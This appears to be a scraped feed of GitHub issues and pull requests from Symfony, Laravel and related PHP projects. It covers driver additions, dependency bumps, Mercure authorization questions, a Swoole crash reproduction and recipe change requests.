  • Adds a BeehiivDriver implementing the Driver interface (subscribe, subscribeOrUpdate, unsubscribe, delete, getMember, hasMember, isSubscribed) against the Beehiiv v2 API, using Laravel's HTTP client (no extra dependency needed).
  • delete() / unsubscribe() look up the member before acting, so a lookup failure surfaces as a real error rather than a false "not found".
  • subscribeOrUpdate() falls back to updating an existing subscriber only on a 400 response, and reactivates via unsubscribe: false (beehiiv's update-by-email endpoint doesn't support reactivate_existing, which is create-only).

Question for maintainer

Beehiiv doesn't publish an official PHP SDK, so this driver talks to their REST API directly via Http::. Because of that, we added tests/Drivers/BeehiivDriverIntegrationTest.php, which hits the real Beehiiv API (requires BEEHIIV_API_KEY / BEEHIIV_PUBLICATION_ID, skipped otherwise) rather than mocking Http::fake().

This repo doesn't currently have any integration-test setup (no existing driver has one, no CI secrets, no separate test suite). Is this something you'd want added as project infrastructure (e.g. a separate Pest test suite/group + CI secrets), or would you rather this driver stick to Http::fake()-based unit tests only, dropping the integration test file?

Test plan

  • vendor/bin/pest (unit suite) — all green
  • vendor/bin/phpstan analyse — no errors
  • BeehiivDriverIntegrationTest run manually against a real Beehiiv sandbox — all 6 passing
View more
dlackty

dlackty

12th Jul 2026 @ 18:37

Hi, i installed cachet manually with docker but i can't get to the web interface. (https://docs.cachethq.io/docs/get-started-with-docker)

image

`

Migrating: 2015_05_24_210948_create_failed_jobs_table Migrated: 2015_05_24_210948_create_failed_jobs_table Migrating: 2015_06_10_122216_AlterTableComponentsDropUserIdColumn Migrated: 2015_06_10_122216_AlterTableComponentsDropUserIdColumn Migrating: 2015_06_10_122229_AlterTableIncidentsDropUserIdColumn Migrated: 2015_06_10_122229_AlterTableIncidentsDropUserIdColumn Migrating: 2015_08_02_120436_AlterTableSubscribersRemoveDeletedAt Migrated: 2015_08_02_120436_AlterTableSubscribersRemoveDeletedAt Migrating: 2015_08_13_214123_AlterTableMetricsAddDecimalPlacesColumn Migrated: 2015_08_13_214123_AlterTableMetricsAddDecimalPlacesColumn Migrating: 2015_10_31_211944_CreateInvitesTable Migrated: 2015_10_31_211944_CreateInvitesTable Migrating: 2015_11_03_211049_AlterTableComponentsAddEnabledColumn Migrated: 2015_11_03_211049_AlterTableComponentsAddEnabledColumn Migrating: 2015_12_26_162258_AlterTableMetricsAddDefaultViewColumn Migrated: 2015_12_26_162258_AlterTableMetricsAddDefaultViewColumn Migrating: 2016_01_09_141852_CreateSubscriptionsTable Migrated: 2016_01_09_141852_CreateSubscriptionsTable Migrating: 2016_01_29_154937_AlterTableComponentGroupsAddCollapsedColumn Migrated: 2016_01_29_154937_AlterTableComponentGroupsAddCollapsedColumn Migrating: 2016_02_18_085210_AlterTableMetricPointsChangeValueColumn Migrated: 2016_02_18_085210_AlterTableMetricPointsChangeValueColumn Migrating: 2016_03_01_174858_AlterTableMetricPointsAddCounterColumn Migrated: 2016_03_01_174858_AlterTableMetricPointsAddCounterColumn Migrating: 2016_03_08_125729_CreateIncidentUpdatesTable Migrated: 2016_03_08_125729_CreateIncidentUpdatesTable Migrating: 2016_03_10_144613_AlterTableComponentGroupsMakeColumnInteger Migrated: 2016_03_10_144613_AlterTableComponentGroupsMakeColumnInteger Migrating: 2016_04_05_142933_create_sessions_table Migrated: 2016_04_05_142933_create_sessions_table Migrating: 2016_04_29_061916_AlterTableSubscribersAddGlobalColumn Migrated: 2016_04_29_061916_AlterTableSubscribersAddGlobalColumn Migrating: 2016_06_02_075012_AlterTableMetricsAddOrderColumn Migrated: 2016_06_02_075012_AlterTableMetricsAddOrderColumn Migrating: 2016_06_05_091615_create_cache_table Migrated: 2016_06_05_091615_create_cache_table Migrating: 2016_07_25_052444_AlterTableComponentGroupsAddVisibleColumn Migrated: 2016_07_25_052444_AlterTableComponentGroupsAddVisibleColumn Migrating: 2016_08_23_114610_AlterTableUsersAddWelcomedColumn Migrated: 2016_08_23_114610_AlterTableUsersAddWelcomedColumn Migrating: 2016_09_04_100000_AlterTableIncidentsAddStickiedColumn Migrated: 2016_09_04_100000_AlterTableIncidentsAddStickiedColumn Migrating: 2016_10_24_183415_AlterTableIncidentsAddOccurredAtColumn Migrated: 2016_10_24_183415_AlterTableIncidentsAddOccurredAtColumn Migrating: 2016_10_30_174400_CreateSchedulesTable Migrated: 2016_10_30_174400_CreateSchedulesTable Migrating: 2016_10_30_174410_CreateScheduleComponentsTable Migrated: 2016_10_30_174410_CreateScheduleComponentsTable Migrating: 2016_10_30_182324_AlterTableIncidentsRemoveScheduledColumns Migrated: 2016_10_30_182324_AlterTableIncidentsRemoveScheduledColumns Migrating: 2016_12_04_163502_AlterTableMetricsAddVisibleColumn Migrated: 2016_12_04_163502_AlterTableMetricsAddVisibleColumn Migrating: 2016_12_05_185045_AlterTableComponentsAddMetaColumn Migrated: 2016_12_05_185045_AlterTableComponentsAddMetaColumn Migrating: 2016_12_29_124643_AlterTableSubscribersAddPhoneNumberSlackColumns Migrated: 2016_12_29_124643_AlterTableSubscribersAddPhoneNumberSlackColumns Migrating: 2016_12_29_155956_AlterTableComponentsMakeLinkNullable Migrated: 2016_12_29_155956_AlterTableComponentsMakeLinkNullable Migrating: 2017_01_03_143916_create_notifications_table Migrated: 2017_01_03_143916_create_notifications_table Migrating: 2017_02_03_222218_CreateActionsTable Migrated: 2017_02_03_222218_CreateActionsTable Migrating: 2017_06_13_181049_CreateMetaTable Migrated: 2017_06_13_181049_CreateMetaTable Migrating: 2017_07_18_214718_CreateIncidentComponents Migrated: 2017_07_18_214718_CreateIncidentComponents Migrating: 2017_09_14_180434_AlterIncidentsAddUserId Migrated: 2017_09_14_180434_AlterIncidentsAddUserId Migrating: 2018_04_02_163328_CreateTaggablesTable Migrated: 2018_04_02_163328_CreateTaggablesTable Migrating: 2018_04_02_163658_MigrateComponentTagTable Migrated: 2018_04_02_163658_MigrateComponentTagTable Migrating: 2018_06_14_201440_AlterSchedulesSoftDeletes Migrated: 2018_06_14_201440_AlterSchedulesSoftDeletes Migrating: 2018_06_17_182507_AlterIncidentsAddNotifications Migrated: 2018_06_17_182507_AlterIncidentsAddNotifications Migrating: 2019_12_12_131400_AlterJobsDropReserved Migrated: 2019_12_12_131400_AlterJobsDropReserved Database seeding completed successfully. Clearing cache... Application cache cleared! Cache cleared! The [public/storage] directory has been linked. Cachet is installed ⚡ Table sessions exists! ... Nothing to migrate. Database seeding completed successfully. Starting Cachet! ... Configuration cache cleared! Configuration cached successfully! 2022-12-18 00:59:13,617 WARN For [program:queue-worker], AUTO logging used for stderr_logfile without rollover, set maxbytes > 0 to avoid filling up filesystem unintentionally 2022-12-18 00:59:13,618 INFO supervisord started with pid 83 2022-12-18 00:59:14,620 INFO spawned: 'nginx' with pid 85 2022-12-18 00:59:14,621 INFO spawned: 'php-fpm' with pid 86 2022-12-18 00:59:14,622 INFO spawned: 'queue-worker' with pid 87 [18-Dec-2022 00:59:14] NOTICE: fpm is running, pid 86 [18-Dec-2022 00:59:14] NOTICE: ready to handle connections 2022-12-18 00:59:15,642 INFO success: nginx entered RUNNING state, process has stayed up for > than 1 seconds (startsecs) 2022-12-18 00:59:15,642 INFO success: php-fpm entered RUNNING state, process has stayed up for > than 1 seconds (startsecs) 2022-12-18 00:59:15,642 INFO success: queue-worker entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)`

image

anyone an idea?

View more
1 comment
PWNYYY

PWNYYY

18th Dec 2022 @ 01:08

Using eventsource as a polyfill supporting headers for SSE, we can avoid issues with cookies.

  • As cookies are shared between tabs, opening multiple tabs for different tasks will cause race conditions and break some mercure connections
  • As cookies in the bundle don't allow configuring samesite, it is more code to support non strict modes
  • As Symfony 5 doesn't even support cookie partitionning, using mercure in a iframe on a third party domain is impossible.

I suggest adding two methods to Twig extension: mercure_url and mercure_token. Both would not trigger cookie creation.

View more
alex-dev

alex-dev

2nd Jun 2025 @ 17:52

help wanted

This will probably be a component to search and select an image from unsplash.

View more
1 comment
joedixon

joedixon

12th Oct 2021 @ 19:59

dependencies Status: Needs Review javascript

Bumps the vue group with 2 updates: @vue/compiler-sfc and vue.

Updates @vue/compiler-sfc from 3.5.34 to 3.5.39

Updates vue from 3.5.34 to 3.5.39

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
  • @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
  • @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
  • @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
  • @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
View more
dependabot[bot]

dependabot[bot]

3rd Jul 2026 @ 13:23

dependencies php
View more
dependabot[bot]

dependabot[bot]

19th Jun 2026 @ 02:05

Q A
Issues Companion to symfony/ux#3481
License MIT

Companion PR to symfony/ux#3466. Adds the Toolkit/Shadcn docs page for the slider recipe.

Kept as draft until symfony/ux#3466 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
Amoifr

Amoifr

18th Apr 2026 @ 14:20

I use Mercure out of Api Platform ecosystem with mercure() Twig function in template to notify the completion of tasks executed in the background, or update graphics in real time, and other updates that do not need to be private but must be reflected in the web interface. All this works fine.

mercure recipe:

mercure:
    hubs:
        default:
            url: '%env(MERCURE_URL)%'
            public_url: '%env(MERCURE_PUBLIC_URL)%'
            jwt:
                secret: '%env(MERCURE_JWT_SECRET)%'
                publish: ['squid/status', 'sysinfo/report', 'server/tools/datetime', 'internet/status', 'cuote/consumo-total', 'squid-proxy/access-log/monitor', 'notif/task-complete/{userId}', 'notif/list/latest/{userId}']
                subscribe: ['squid/status', 'sysinfo/report', 'server/tools/datetime', 'internet/status', 'cuote/consumo-total', 'squid-proxy/access-log/monitor', 'notif/task-complete/{userId}', 'notif/list/latest/{userId}']

In base template.html.twig:

{% block eventsource_javascript %}
    {% set config = {'mercureHub':mercure(['squid/status', 'notif/task-complete/'~app.user.idPublico|uuid_encode, 'notif/list/latest/'~app.user.idPublico|uuid_encode], { subscribe:['squid/status', 'notif/task-complete/'~app.user.idPublico|uuid_encode, 'notif/list/latest/'~app.user.idPublico|uuid_encode]})} %}
    <script id="mercure" type="application/json">
        {{ config|json_encode(constant('JSON_UNESCAPED_SLASHES') b-or constant('JSON_HEX_TAG'))|raw }}
    </script>
{% endblock %}

If user init sesion in web app, and copy the mercure url request ( _https://squidmgr.lan/.well-known/mercure?topic=squid%2Fstatus&topic=sysinfo%2Freport&topic=server%2Ftools%2Fdatetime&topic=internet%2Fstatus&topic=cuote%2Fconsumo-total&topic=notif%2Ftask-complete%2F2nC0OMu3USsHE0AdKkreLz&topic=notif%2Flist%2Flatest%2F2nC0OMu3USsHE0AdKkreLz_), logout application session and paste copied url in browser all messages related to the topics present in the copied url remain accessible, if the same user init session in another browser or computer, the updates of topics that include the user id are visible in the browser that access directly to mercure request url. On the other hand, if the user closes the browser, reopens it and pastes the url, then the message Unauthorized by Mercure is displayed. It's suppose that when logout process occur, the mercureAuthorization cookie is destroyed??? Publics updates don't care that be accessible out of the session, but privates Updates is necessary that do not be accessible out of user session.

I need that'notif/task-complete/{userId}' or 'notif/list/latest/{userId}' for example, don't be accessible if user logout.

View more
frizquierdo

frizquierdo

21st Oct 2023 @ 14:00

Hello Symfony Team and thanks for all your work, it's amazing !

I noticed that stimulus-bundle recipe adds lines in assets/bootstrap.js file and these differ depending on Composer dependencies.

{
    "bundles": {
        "Symfony\\UX\\StimulusBundle\\StimulusBundle": ["all"]
    },
    "add-lines": [
        {
            "file": "assets/bootstrap.js",
            "content": "import { startStimulusApp } from '@symfony/stimulus-bridge';\n\n// Registers Stimulus controllers from controllers.json and in the controllers/ directory\nexport const app = startStimulusApp(require.context(\n    '@symfony/stimulus-bridge/lazy-controller-loader!./controllers',\n    true,\n    /\\.[jt]sx?$/\n));",
            "position": "top",
            "requires": "symfony/webpack-encore-bundle"
        },
        {
            "file": "assets/bootstrap.js",
            "content": "import { startStimulusApp } from '@symfony/stimulus-bundle';\n\nconst app = startStimulusApp();",
            "position": "top",
            "requires": "symfony/asset-mapper"
        },        
    ]
}

I was wondering if it was possible to update the recipe to add content but this time the dependency would not be from the symfony/* namespace but pentatrion/vite-bundle ?

I am the maintainer of this bundle that allows to integrate Vite into a Symfony application. Vite natively uses ESM, the @symfony/stimulus-bridge package is only compatible with commonjs and cannot be used. (it uses require.context)

the project documentation is here: https://symfony-vite.pentatrion.com

as an example I would like the symfony/stimulus-bundle recipe to make changes to the bootstrap.js file to make it look like this.

// assets/bootstrap.js
import { startStimulusApp, registerControllers } from "vite-plugin-symfony/stimulus/helpers";

const app = startStimulusApp();
registerControllers(
  app,
  import.meta.glob('./controllers/*_controller.js', {
    query: "?stimulus",
    /**
     * always true, the `lazy` behavior is managed internally with
     * import.meta.stimulusFetch
     */
    eager: true,
  })
)

It's been about 1 year since I made Vite compatible with the stimulus-bundle ecosystem and Symfony UX and the integration is now stable.

Currently the whole thing works but it requires additional work from the developer. In order to improve the developer experience I would like to intervene on certain recipes.

So I would like to know if a PR from me could be accepted?

My request concerns

and the github: https://github.com/lhapaipai/symfony-vite-dev

Thank you and have a good evening

View more
1 comment
lhapaipai

lhapaipai

22nd Aug 2024 @ 21:21

name: symfony/panther version : * v2.2.0, source : [git] https://github.com/symfony/panther.git b7e0f834c9046918972edb3dde2ecc4a20f6155e

Running in Docker container: php:8.4.3-cli Debian GNU/Linux 12 (bookworm) Chromium 132.0.6834.110 built on Debian GNU/Linux 12 (bookworm) ChromeDriver 132.0.6834.110 (df453a35f099772fdb954e33551388add2ca3cde-refs/branch-heads/6834_101@{#3})

Throws 'HP Fatal error: Uncaught Facebook\WebDriver\Exception\UnknownErrorException: unknown error: Unable to resolve weakLocalObjectReference=1 (Session info: chrome=132.0.6834.110) in ../vendor/php-webdriver/webdriver/lib/Exception/WebDriverException.php:146'

Stack trace: #0 ../vendor/php-webdriver/webdriver/lib/Remote/HttpCommandExecutor.php(359): Facebook\WebDriver\Exception\WebDriverException::throwException('unknown error', 'unknown error: ...', Array) #1 ../vendor/php-webdriver/webdriver/lib/Remote/RemoteWebDriver.php(601): Facebook\WebDriver\Remote\HttpCommandExecutor->execute(Object(Facebook\WebDriver\Remote\WebDriverCommand)) #2 ../vendor/php-webdriver/webdriver/lib/Remote/RemoteWebDriver.php(345): Facebook\WebDriver\Remote\RemoteWebDriver->execute('executeScript', Array) #3 ../vendor/symfony/panther/src/Client.php(692): Facebook\WebDriver\Remote\RemoteWebDriver->executeScript('return window.performance.getEntries();', Array)

Same codebase runs fine in php8.2.2 environment: php:8.2.2-cli Debian GNU/Linux 11 (bullseye) Chromium 120.0.6099.224 built on Debian 11.8, running on Debian 11.6 ChromeDriver 120.0.6099.224 (3587067cafd6f5b1e567380acb485d96e623ef39-refs/branch-heads/6099@{#1761})

View more
sm-riga

sm-riga

31st Jan 2025 @ 09:47

refactor

Contact Details

No response

Refactoring Title

Improve notification stream

Refactoring Description

Currently the logic mostly lives in the BackupTask model, which was okay when it was just a couple of notification choices but it's getting pretty unweildly.

In the future this should be addressed and extracted into its own set of classes in the app/Services directory.

Notifications are pretty well tested and that's not an area I'm concerned about, but it could do with some love to make it less messy to work on. There doesn't need to be any change in functionality but I am concerned about the code in the long-term.

Current Issues

No response

Additional Context

No response

View more
2 comments
lewislarsen

lewislarsen

27th Aug 2024 @ 22:13

Hi,

First issue/contribution here, let me know if I need to change something. :-)

As described in the documentation the config/secrets/prod/prod.decrypt.private.php file must not be committed to the repository. The recipe for this works as expected. But assuming we have other environments as staging which shouldn't be exposed either (at least to me) the private keys of these environments are not protected by the current configuration.

Maybe the framework-bundle/*/manifest.json should be updated like so in the gitignore section:

-        "/%CONFIG_DIR%/secrets/prod/prod.decrypt.private.php",
+        "/%CONFIG_DIR%/secrets/*/*.decrypt.private.php",
+        "!/%CONFIG_DIR%/secrets/dev/dev.decrypt.private.php",

What do you think?

As mentioned in the readme, recipes should not be updated for the previous versions so I was not sure how to propose the PR. Maybe in the framework-bundle/7.3/manifest.json? Should I copy the 7.2 structure and update only the proposed part?

Let me know, I can provide the PR if you think the change is appropriate.

View more
2 comments
flohw

flohw

4th Jun 2024 @ 07:32

Q A
License MIT
Doc issue/PR n/a

Title: Fix exit code handling in create-project job

Summary

This PR fixes the exit code handling in the "Create-project with skeleton ^6" step so that the informational message is correctly displayed when a package doesn't support Symfony 6.

Related issues:

Issues Fixed

Missing $ prefix: The condition [[ EXIT_CODE -eq 2 ]] was missing the $ before EXIT_CODE, causing the check to always fail

Script exits before capturing exit code: GitHub Actions runs bash with -e flag, so when composer require fails, the script exits immediately before EXIT_CODE=$? can capture the exit code. Fixed by using EXIT_CODE=0 followed by composer require ... || EXIT_CODE=$?

Improved message formatting: Added a green-colored border box for better visibility in the logs

Before

composer require -W --ansi $PACKAGES
EXIT_CODE=$?                          # Never reached if composer fails
if [[ EXIT_CODE -eq 2 ]]; then        # Missing $ prefix

After

EXIT_CODE=0
composer require -W --ansi $PACKAGES || EXIT_CODE=$?
if [[ $EXIT_CODE -eq 2 ]]; then
View more
1 comment
outcomer

outcomer

16th Jan 2026 @ 18:31

Problem

When using Octane with Swoole and the default configuration (enable_coroutine=false), any HTTP response larger than 1MB causes a fatal error:

PHP Fatal error: Uncaught Swoole\Error: API must be called in the coroutine
  in vendor/laravel/octane/src/Swoole/SwooleClient.php:266
#0 Swoole\Http\Response->write('XXXXXXXXXXXXXXX...')
#1 SwooleClient->sendResponseContent(...)
#2 SwooleClient->respond(...)
#3 Worker->handle(...)

Reproduction

Fresh Laravel + Octane setup:

composer create-project laravel/laravel octane-test --prefer-dist
cd octane-test
composer require laravel/octane
php artisan octane:install --server=swoole --no-interaction

Add a route that returns a response larger than 1MB:

// routes/web.php
Route::get('/large-response', function () {
    return response(str_repeat('X', 60 * 1024 * 1024)); // 60MB
});

Start the server and make a request:

php artisan octane:start --server=swoole --host=127.0.0.1 --port=8000 &
sleep 3
curl http://127.0.0.1:8000/large-response

Result:

PHP Fatal error:  Uncaught Swoole\Error: API must be called in the coroutine
  in vendor/laravel/octane/src/Swoole/SwooleClient.php:266
Stack trace:
#0 Swoole\Http\Response->write('XXXXXXXXXXXXXXX...')
#1 SwooleClient->sendResponseContent(...)
#2 SwooleClient->respond(...)
#3 Worker->handle(...)
#4 swoole-server(122): Worker->handle(...)

Environment

  • PHP 8.5.6
  • Swoole 6.2.2
  • Laravel Octane v2.17.5
  • Laravel 12
View more
L3o-pold

L3o-pold

9th Jul 2026 @ 13:44

Hi @dunglas, it's possible pass additionals payload to mercure twig function!? Any example of it? Thank you.

View more
frizquierdo

frizquierdo

8th Mar 2023 @ 14:31

dependencies php

Bumps the composer group with 1 update in the / directory: symfony/http-foundation.

Updates symfony/http-foundation from 7.3.6 to 7.3.7

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
  • @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
  • @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
  • @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
  • @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions You can disable automated security fix PRs for this repo from the Security Alerts page.
View more
dependabot[bot]

dependabot[bot]

12th Nov 2025 @ 23:40

Hello there, it's my first issue here so let me follow my usual tradition and thank you for the work around the bundle, it makes a serious difference in the Symfony ecosystem.

Context: this issue is not a concrete idea, but I'm trying to highlight where LLM usage is a good idea and trigger discussions.

I figured out that this bundle is some kind of clever class generation around Symfony, and I was asking myself how to make it even better to make an even bigger difference!

This is how I noticed that maybe the make:unit-test or make:functional-test could be an even more powerful feature combined with an LLM capable of reading the context of the project and generate a test that:

  • Follow the project conventions
  • With some tests already written

Of course this would require an integration with an LLM which would be out of the scope of the project and highlight that maybe an issue should be open on Symfony side for a new component?

I'm super-curious of what you think of such feature. (I believe it's the first one about an LLM integration!)

Thanks for your attention

View more
2 comments
Nek-

Nek-

19th May 2025 @ 13:11

Status: Needs Review FrameworkBundle

Fixes #22246.

Adds a new reference/configuration/routing.rst page documenting the keys available when defining user routes in config/routes.{yaml,xml,php} and on the #[Route] PHP attribute. The framework.router configuration remains in the Framework Configuration Reference.

View more
1 comment
lacatoire

lacatoire

15th Apr 2026 @ 08:02

Documentation Status: Needs Review Feature TwigComponent
Q A
Bug fix? no
New feature? yes
Deprecations? no
Documentation? yes
Issues Fix #2905 / https://github.com/symfony/ux/pull/3395
License MIT

Add support for dynamic component names in the {% component %} tag, in the HTML-like syntax using <twig:component>, and in the component() function.

{% component %} tag syntax

{# Dynamic variable (must be wrapped in parentheses) #}
{% component (componentName) %}{% endcomponent %}

{# Dynamic expression #}
{% set prefix = 'DynamicNameComponent' %}
{% for i in 1..2 %}
    {% component (prefix ~ i) %}{% endcomponent %}
{% endfor %}

{# Component object #}
{% component (componentObject) %}{% endcomponent %}

HTML-like syntax

{# Static component name #}
<twig:component is="Alert" type="success" />

{# Dynamic component name #}
<twig:component :is="componentName" type="success" />

{# Dynamic with content (paired tag) #}
<twig:component :is="componentName" type="success">
    Content here
</twig:component>

{# Dynamic in a loop #}
{% set prefix = 'DynamicNameComponent' %}
{% for i in 1..2 %}
    <twig:component :is="prefix ~ i" />
{% endfor %}

component() function

{{ component(componentName, {type: 'success'}) }}
View more
2 comments
seb-jean

seb-jean

8th Jul 2026 @ 14:11

documentation help wanted good first issue

Provide updates to new functionalities in the v2 of the package.

View more
kwakuOfosuAgyeman

kwakuOfosuAgyeman

5th Jan 2025 @ 05:45

View more
18 comments 👍 2 👎 1 😕 1
mpiot

mpiot

13th Jan 2019 @ 12:33

dependencies javascript

Bumps vite from 6.4.2 to 8.1.4.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

10th Jul 2026 @ 03:02

Hi,

first of all, thanks for this great piece of software!

I'm trying to define a custom handler which should do some filtering on the LogRecord and then forward some of those to a nested handler. I've spent a couple hours on it, and I'm not sure if I'm missing something or if it's not possible yet.

In some more details: I've seen the issue #206 which is similar to what I'm trying to achieve, and I subsequently see that I can put

type: service
id: my_handler

in order to reference my class.

But I don't understand if (and how) I can reference a nested handler.

Said differently, what I would like to have is a conf similar to the crossed_finger one; ie, like

monolog:
  handlers:
    my_handler:
      type: service
      id: my_handler
      handler: file
    file:
      type: rotating_file

When I read the code of buildHandler I have the feeling that it is not possible. (Unless if it has something to do with the nested config (I'm afraid I don't really understand what that does)).

So my questions are:

  1. Am I missing something; Is the feature I'm looking for already available?
  2. Or, if it is not possible, would you be open to adding it? (in which case I could try to propose a pull request if we can agree on an approach. I guess I should copy what is done for the finger_crossed handler, but I'm afraid there may not be a generic way to inject some nested handler)
View more
gturri

gturri

22nd Apr 2024 @ 21:06

View more
3 comments 👍 1
Gwemox

Gwemox

8th Apr 2021 @ 09:04

Hi,

Where are the apache-pack files? 🤔 Any doc or htaccess examples?

View more
1 comment
kanlukasz

kanlukasz

26th Feb 2026 @ 18:54

Hello 👋

The mercure-bundle recipe doesn't include the latest healthcheck test available in the nercure documentation in the compose.yaml for an implementation behind Traefik.

mercure:
  # [...]
  healthcheck:
    test: ["CMD", "curl", "-f", "https://localhost/healthz"]
    timeout: 5s
    retries: 5
    start_period: 60s

Instead of :

mercure:
  # [...]
  healthcheck:
    test: ["CMD", "wget", "--no-verbose", "--tries=1", "--spider", "http://localhost/healthz"]
    timeout: 5s
    retries: 5
    start_period: 60s

The latest image doesn't come with curl which cause the container to never be healthy and nor routed by traefik. Updating the test command fixes the issue.

View more
humblots

humblots

20th Nov 2025 @ 13:35

enhancement pending changes

Summary

  • Inject `` into per-item table column closures (color(), tooltip(), url(), formatStateUsing(), icon(), etc.) for relationship columns such as teams.name
  • Resolve and cache related Eloquent models alongside relationship state via getRelationshipRecords() and getRelationshipRecord()
  • Add comprehensive Pest coverage for belongs-to, many-to-many, nested, distinct list, and rendering scenarios

Fixes #19121

Test plan

  • php vendor/bin/pest tests/src/Tables/Columns/RelationshipRecordColumnTest.php (16 tests)
  • CI checks on this PR
View more
mohammedelkarsh

mohammedelkarsh

28th Jun 2026 @ 19:51

Q A
Issues Related to symfony/ux#3369
License MIT

The importmap pinned Tom Select 2.3.1, with its CSS files pinned at two different versions (2.3.1 and 2.4.3). Tom Select 2.6.0 ships the fix for the dropdown scrolling back to the top when the virtual scroll plugin loads the next page (orchidjs/tom-select#1017, reported in symfony/ux#3369), so this bumps everything to 2.6.2.

Done with bin/console importmap:update tom-select …, which also pins @orchidjs/sifter and @orchidjs/unicode-variants: since 2.6, the ESM build no longer inlines them.

Tested locally on the /autocomplete page: Tom Select initializes, the Ajax search and the virtual scroll both work, no console error.

View more
Amoifr

Amoifr

12th Jul 2026 @ 18:58

MCP Bundle

Summary

When an MCP tool returns an array, the SDK emits the result twice — a serialized-JSON TextContent block (ToolReference::formatResult()) and structuredContent (ToolReference::extractStructuredContent(), wired in CallToolHandler). Different clients want opposite shapes, and there's no first-class way to vary the result per client.

The problem

  • ChatGPT connectors: when a result carries both a JSON text block and structuredContent, ChatGPT treats it as a large payload, truncates it ("Response output was truncated … to fit the tool response budget"), stores it as a resource, and chains internal "Read resource" paging that elides fields — so identifiers (ids, etc.) never reach the model. Returning only structuredContent (empty content) fixes it. (See OpenAI community report 1383071.)
  • Claude Desktop / Claude Code / Cursor: read the text content block; dropping it leaves the model with nothing.

So the correct content shape is genuinely client-dependent, but the framework gives no hook for it.

What we had to do (works, but boilerplate + a footgun)

For every tool: declare a ?RequestContext $context parameter, read $context->getSession()->get('client_info'), and hand-build a CallToolResult choosing content: [] + structuredContent for OpenAI clients vs. text + structuredContent for the rest.

Footgun encountered: our first attempt used a parameter named $_session. SchemaGenerator throws on reserved parameter names (_session/_request) during discovery, which aborts discovery and registers zero tools — while the DI container still compiles, so it looks healthy but the live server returns "no tools". RequestContext is the correct injection, but this isn't obvious from the docs.

Feature request

First-class support for client-conditional structured results, e.g. one or more of:

  1. Honor the negotiated client capabilities / client_info so clients that consume structuredContent don't also receive the redundant JSON text dump (and vice-versa) — ideally automatic.
  2. A per-tool toggle (attribute/option, e.g. structuredContentOnly) and/or a small documented helper to shape the result from the injected RequestContext.
  3. Docs for the RequestContext injection pattern and the reserved _session/_request parameter names (so the silent "zero tools" discovery failure is avoidable).

Environment

  • symfony/mcp-bundle v0.10.0
  • mcp/sdk v0.6.0
  • PHP 8.4.20
View more
1 comment
mikepage

mikepage

19th Jun 2026 @ 18:24

Context

Symfony Flex is a great tool to get up an running when installing new components, but it has some issues:

We are using PHP to configure packages and components (ex : ./config/packages/doctrine.php, ./config/services.php).

We are using a different directory structure to organize our code were the Application layer is separated from the Domain and the Infrastructure.

Problem

When we use Composer to add or update any project dependency, Flex is noticing that some files are missing and creates them.

We end up having unwanted ./config/**.yaml files and empty directories like so ./src/{Controller,Entity/Repository}/.gitignore.

Possible solutions

  • Being able to tell flex that some files are not wanted (for example, by providing glob patterns in the composer extra section).
  • Prevent flex from creating files when adding/removing dependencies without recipes or when updating a dependency without a recipe.

Thank you for your consideration

View more
guillemcanal

guillemcanal

4th Aug 2025 @ 13:09

dependencies github_actions

Bumps actions/cache from 5 to 6.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
